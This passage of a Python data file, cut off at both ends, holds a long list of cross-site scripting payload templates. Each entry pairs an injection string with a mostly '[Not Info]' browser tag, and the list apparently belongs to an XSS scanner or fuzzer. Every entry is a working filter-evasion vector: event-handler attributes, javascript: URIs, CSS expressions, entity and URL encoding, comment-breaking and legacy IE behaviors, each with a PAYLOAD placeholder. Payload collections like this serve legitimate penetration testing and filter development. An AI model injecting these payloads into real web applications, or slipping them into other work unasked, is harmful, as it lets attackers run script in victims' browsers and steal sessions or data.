		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseOver html onMouseOver="javascript:javascript:PAYLOAD"></html onMouseOver>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseEnter html onMouseEnter="javascript:parent.javascript:PAYLOAD"></html onMouseEnter>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onBeforeUnload body onBeforeUnload="javascript:javascript:PAYLOAD"></body onBeforeUnload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseDown html onMouseDown="javascript:javascript:PAYLOAD"></html onMouseDown>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<marquee onScroll marquee onScroll="javascript:javascript:PAYLOAD"></marquee onScroll>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<xml onPropertyChange xml onPropertyChange="javascript:javascript:PAYLOAD"></xml onPropertyChange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onBlur frameset onBlur="javascript:javascript:PAYLOAD"></frameset onBlur>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:PAYLOAD"></applet onReadyStateChange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg onUnload svg onUnload="javascript:javascript:PAYLOAD"></svg onUnload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseOut html onMouseOut="javascript:javascript:PAYLOAD"></html onMouseOut>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onMouseMove body onMouseMove="javascript:javascript:PAYLOAD"></body onMouseMove>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onResize body onResize="javascript:javascript:PAYLOAD"></body onResize>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<object onError object onError="javascript:javascript:PAYLOAD"></object onError>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onPopState body onPopState="javascript:javascript:PAYLOAD"></body onPopState>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseMove html onMouseMove="javascript:javascript:PAYLOAD"></html onMouseMove>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<applet onreadystatechange applet onreadystatechange="javascript:javascript:PAYLOAD"></applet onreadystatechange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onpagehide body onpagehide="javascript:javascript:PAYLOAD"></body onpagehide>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg onunload svg onunload="javascript:javascript:PAYLOAD"></svg onunload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<applet onerror applet onerror="javascript:javascript:PAYLOAD"></applet onerror>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onkeyup body onkeyup="javascript:javascript:PAYLOAD"></body onkeyup>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onunload body onunload="javascript:javascript:PAYLOAD"></body onunload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onload iframe onload="javascript:javascript:PAYLOAD"></iframe onload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onload body onload="javascript:javascript:PAYLOAD"></body onload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onmouseover html onmouseover="javascript:javascript:PAYLOAD"></html onmouseover>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<object onbeforeload object onbeforeload="javascript:javascript:PAYLOAD"></object onbeforeload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onbeforeunload body onbeforeunload="javascript:javascript:PAYLOAD"></body onbeforeunload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onfocus body onfocus="javascript:javascript:PAYLOAD"></body onfocus>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onkeydown body onkeydown="javascript:javascript:PAYLOAD"></body onkeydown>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onbeforeload iframe onbeforeload="javascript:javascript:PAYLOAD"></iframe onbeforeload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe src iframe src="javascript:javascript:PAYLOAD"></iframe src>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg onload svg onload="javascript:javascript:PAYLOAD"></svg onload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onmousemove html onmousemove="javascript:javascript:PAYLOAD"></html onmousemove>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onblur body onblur="javascript:javascript:PAYLOAD"></body onblur>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''--><!-- ---> <img src=xxx:x onerror=javascript:PAYLOAD> -->''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>-javascript:PAYLOAD</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onscroll=javascript:PAYLOAD><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<form id=test onforminput=javascript:PAYLOAD><input></form><button form=test onformchange=javascript:PAYLOAD>X''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''<video><source onerror="javascript:javascript:PAYLOAD">''',
		  'browser':"""[HTML5 Injection]"""},
        { 'payload':'''<form><button formaction="javascript:javascript:PAYLOAD">X''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body oninput=javascript:PAYLOAD><input autofocus>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<math href="javascript:javascript:PAYLOAD">X</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:PAYLOAD">X</maction> </math>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onload=javascript:PAYLOAD>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<table background="javascript:javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<!--<img src="--><img src=x onerror=javascript:PAYLOAD//">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<comment><img src="</comment><img src=x onerror=javascript:PAYLOAD)//">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<![><img src="]><img src=x onerror=javascript:PAYLOAD//">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<style><img src="</style><img src=x onerror=javascript:PAYLOAD//">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<li style=list-style:url() onerror=javascript:PAYLOAD> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:PAYLOAD></div>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<head><base href="javascript://"></head><body><a href="/. /,javascript:PAYLOAD//#">X</a></body>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>javascript:PAYLOAD</SCRIPT>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:PAYLOAD"></OBJECT>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<b <script>PAYLOAD</script>0''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<div id="div1"><input value="``onmouseover=javascript:PAYLOAD"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<x '="foo"><x foo='><img src=x onerror=javascript:PAYLOAD//'>''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''<embed src="javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<image src="javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img src="javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script src="javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=javascript:PAYLOAD>x''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<? foo="><script>javascript:PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<! foo="><script>javascript:PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''</ foo="><script>javascript:PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<? foo="><x foo='?><script>javascript:PAYLOAD</script>'>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<! foo="[[[Inception]]"><x foo="]foo><script>javascript:PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<% foo><x foo="%><script>javascript:PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<div id=d><x xmlns="><iframe onload=javascript:PAYLOAD"></div> <script>d.innerHTML=d.innerHTML</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img[a][b][c]src[d]=x[e]onerror=[f]"PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:PAYLOAD>XXX</a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img src="x` `<script>javascript:PAYLOAD</script>"` `>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img src onerror /" '"= alt=javascript:PAYLOAD//">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<title onpropertychange=javascript:PAYLOAD></title><title title=>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:PAYLOAD></a>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<!--[if]><script>javascript:PAYLOAD</script -->''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<!--[if<img src=x onerror=javascript:PAYLOAD//]> -->''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a style="-o-link:'javascript:javascript:PAYLOAD';-o-link-source:current">X''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<style>p[foo=bar{}*{-o-link:'javascript:javascript:PAYLOAD'}{}*{-o-link-source:current}]{color:red};</style>''',
    	  'browser':"""[Not Info]"""},
        { 'payload':'''<link rel=stylesheet href=data:,*%7bx:expression(javascript:PAYLOAD)%7d''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<style>@import "data:,*%7bx:expression(javascript:PAYLOAD)%7D";</style>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:PAYLOAD;">X</a></a><a href="javascript:javascript:PAYLOAD">X</a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<div style="list-style:url(http://foo.f)\20url(javascript:javascript:PAYLOAD);">X''',
    	  'browser':"""[Not Info]"""},
        { 'payload':'''<script>({set/**/$($){_/**/setter=$,_=javascript:PAYLOAD}}).$=eval</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script>({0:#0=eval/#0#/#0#(javascript:PAYLOAD)})</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:PAYLOAD}),x</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:PAYLOAD')()</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''X<x style=`behavior:url(#default#time2)` onbegin=`javascript:PAYLOAD` >''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:PAYLOAD&gt;`>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:PAYLOAD&gt;>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:PAYLOAD strokecolor=white strokeweight=1000px from=0 to=1000 /></a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:PAYLOAD">X</a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<event-source src="%(event)s" onload="javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javascript:javascript:PAYLOAD"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:PAYLOAD&gt;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:PAYLOAD&gt;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG SRC="javascript:javascript:PAYLOAD;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG SRC=javascript:javascript:PAYLOAD>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG SRC=`javascript:javascript:PAYLOAD`>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<FRAMESET><FRAME SRC="javascript:javascript:PAYLOAD;"></FRAMESET>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<BODY ONLOAD=javascript:javascript:PAYLOAD>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG SRC="jav    ascript:javascript:PAYLOAD;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:PAYLOAD>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:javascript:PAYLOAD;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG DYNSRC="javascript:javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG LOWSRC="javascript:javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<BGSOUND SRC="javascript:javascript:PAYLOAD;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<BR SIZE="&{javascript:PAYLOAD}">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:javascript:PAYLOAD;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>li {list-style-image: url("javascript:javascript:PAYLOAD");}</STYLE><UL><LI>X''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:PAYLOAD;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:PAYLOAD;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IFRAME SRC="javascript:javascript:PAYLOAD;"></IFRAME>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<TABLE BACKGROUND="javascript:javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<TABLE><TD BACKGROUND="javascript:javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="background-image: url(javascript:javascript:PAYLOAD)">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="width:expression(javascript:PAYLOAD);">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG STYLE="x:expr/*X*/ession(javascript:PAYLOAD)">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<XSS STYLE="x:expression(javascript:PAYLOAD)">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE TYPE="text/javascript">javascript:PAYLOAD;</STYLE>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>.XSS{background-image:url("javascript:javascript:PAYLOAD");}</STYLE><A CLASS=XSS></A>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:javascript:PAYLOAD")}</STYLE>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<BASE HREF="javascript:javascript:PAYLOAD;//">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':"""<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:PAYLOAD></OBJECT>""",
		  'browser':"""[O9.02]"""},
		{ 'payload':'''<HTML xmlns:x><?import namespace="x" implementation="%(htc)s"><x:x>XSS</x:x></HTML>""","XML namespace."),("""<XML ID="x"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:PAYLOAD"&gt;</B></I></XML><SPAN DATASRC="#x" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:PAYLOAD&lt;/SCRIPT&gt;"></BODY></HTML>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<form id="test" /><button form="test" formaction="javascript:javascript:PAYLOAD">X''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onscroll=javascript:PAYLOAD><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:PAYLOAD">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:PAYLOAD;');}</STYLE>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:PAYLOAD&&;&&<&&/script&&>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT onreadystatechange=javascript:javascript:PAYLOAD;></SCRIPT>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:PAYLOAD;</html:script></html:html>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<embed code=javascript:javascript:PAYLOAD></embed>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onload=javascript:javascript:PAYLOAD></frameset>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<object onerror=javascript:javascript:PAYLOAD>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:PAYLOAD;">]]</C><X></xml>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG SRC=&{javascript:PAYLOAD;};>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a href="jav&#65ascript:javascript:PAYLOAD">X</a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a href="jav&#97ascript:javascript:PAYLOAD">X</a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:PAYLOAD&amp;gt;>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<IMG SRC=JaVaScRiPt:PAYLOAD>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a onmouseover="PAYLOAD">X</a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a onmouseover=PAYLOAD>X</a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:PAYLOAD;">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>@im\port'\ja\vasc\ript:PAYLOAD';</STYLE>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>.X{background-image:url("javascript:PAYLOAD");}</STYLE><A CLASS=X></A>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:PAYLOAD")}</STYLE>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<XSS STYLE="xss:expression(PAYLOAD)">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<BASE HREF="javascript:PAYLOAD;//">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img src=`%00`&NewLine; onerror=PAYLOAD&NewLine;''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/src="data:text/html,<svg &#111;&#110;load=PAYLOAD>">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; PAYLOAD" http-equiv="refresh"/>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javascript:void(0)" onmouseover=&NewLine;javascript:PAYLOAD&NewLine;>X</a>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<marquee onstart='javascript:PAYLOAD&#x28;1&#x29;'>^__^''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/%00/ src=javaSCRIPT&colon;PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<%<!--'%><script>PAYLOAD;</script -->''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script src="data:text/javascript,PAYLOAD"></script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/onreadystatechange=PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg/onload=PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<input type="text" value=`` <div/onmouseover='PAYLOAD'>X</div>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''http://www.<script>PAYLOAD</script .com''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg><script ?>PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img src=`xx:xx`onerror=PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<meta http-equiv="refresh" content="0;javascript&colon;PAYLOAD"/>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script>+-+-1-+-+PAYLOAD</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body/onload=&lt;!--&gt;&#10PAYLOAD>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script itworksinallbrowsers>/*<script* */PAYLOAD</script''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img src ?itworksonchrome?\/onerror = PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg><script onlypossibleinopera:-)> PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script x> PAYLOAD </script 1=2''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<div/onmouseover='PAYLOAD'> style="x:">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<--`<img/src=` onerror=PAYLOAD> --!>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="PAYLOAD">x</button>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''AuDiO/**/oNLoaDStaRt="(_=/**/confirm/**/(PAYLOAD))"/src><!--y''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<mArquee onStart=[~[onmouseleave(([[(alert(PAYLOAD))]]))]] ]''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img src="/" =_=" title="onerror='/**/prompt(PAYLOAD)'">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<w="/x="y>"/ondblclick=`<`[confir\u006d``]>PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a/onmousemove=alert(PAYLOAD)//>y''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<object allowscriptaccess=always><param name=code value=PAYLOAD>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg+onload=eval(location.hash.substr(1))>#alert(PAYLOAD)''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<details/open/ontoggle=confirm('PAYLOAD')>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''</script><svg><script>alert(PAYLOAD)/&apos;''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg </onload ="1> (_=prompt,_(PAYLOAD)) "">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg 1=""onload=alert(PAYLOAD)>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<output name="jAvAsCriPt://&NewLine;\u0061ler&#116(PAYLOAD)" onclick="eval(name)">X</output>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<button onmousemove="javascript:alert(PAYLOAD)">y''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<BoDy%0AOnpaGeshoW=+window.prompt(PAYLOAD)''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<a href=[0x0b]xss" onfocus=prompt(PAYLOAD) autofocus fragment="''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<isindex type=image src=1 onerror=alert(PAYLOAD)>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script>a=eval;b=alert;a(b(/ PAYLOAD/.source));</script>'">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<!'/!"/!\'/\"/--!><Input/Type=Text AutoFocus */; OnFocus=(confirm)(PAYLOAD) //>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''\u003csvg/onload=alert`PAYLOAD`\u003e''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<article xmlns ="urn:img src=x onerror=y()//" >PAYLOAD''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img / src = \ 'y \' // onerror = \ 'alert (PAYLOAD) \ '>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img/src=q onerror='new Function`al\ert\`PAYLOAD\``'>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<Html Onmouseover=(alert)(PAYLOAD) //''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(PAYLOAD);>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<scr<!--esi-->ipt>aler<!--esi-->t(PAYLOAD)</sc<!--esi-->ript>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''&#x003c;img src=1 onerror=confirm(PAYLOAD)&#x003e;''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''%26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(PAYLOAD)%26%23x003e%3B%0A''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/PAYLOAD/%2529%253E''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<x+oncut=y=prompt,y`PAYLOAD`>y''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svG x=">" onload=(PAYLOAD)``>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script/y~~~>;alert(PAYLOAD);</script/Y~~~>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<VideO/**/OnerroR=~alert("PAYLOAD")+/SrC>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<video/poster/onerror=prompt(PAYLOAD)>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<sVG/xss/OnLoaD+="window['confirm']+(PAYLOAD)">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<img x/src=x /onerror="x-\u0063onfirm(PAYLOAD)">''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<VidEo/oNLoaDStaRt=confirm(PAYLOAD)+/src>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<p/%0Aonmouseover%0A=%0Aconfirm(PAYLOAD)>y''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<span/onmouseover=confirm(PAYLOAD)>y''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg/onload=window.onerror=alert;throw/PAYLOAD/;//''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''%00<body onload=alert(PAYLOAD)>''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''&#00;</form><input type&#61;"date" onfocus="alert(PAYLOAD)">''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''"'`><%00img src=xxx:x onerror=javascript:alert(PAYLOAD)>>''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''%00“><script>alert(PAYLOAD)</script>''',
    	  'browser':"""[Not Info]"""},
        { 'payload':''''`"><%00script>javascript:alert(PAYLOAD)</script>''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''--><!-- --%21> <img src=xxx:x onerror=javascript:alert(PAYLOAD)> -->>''',
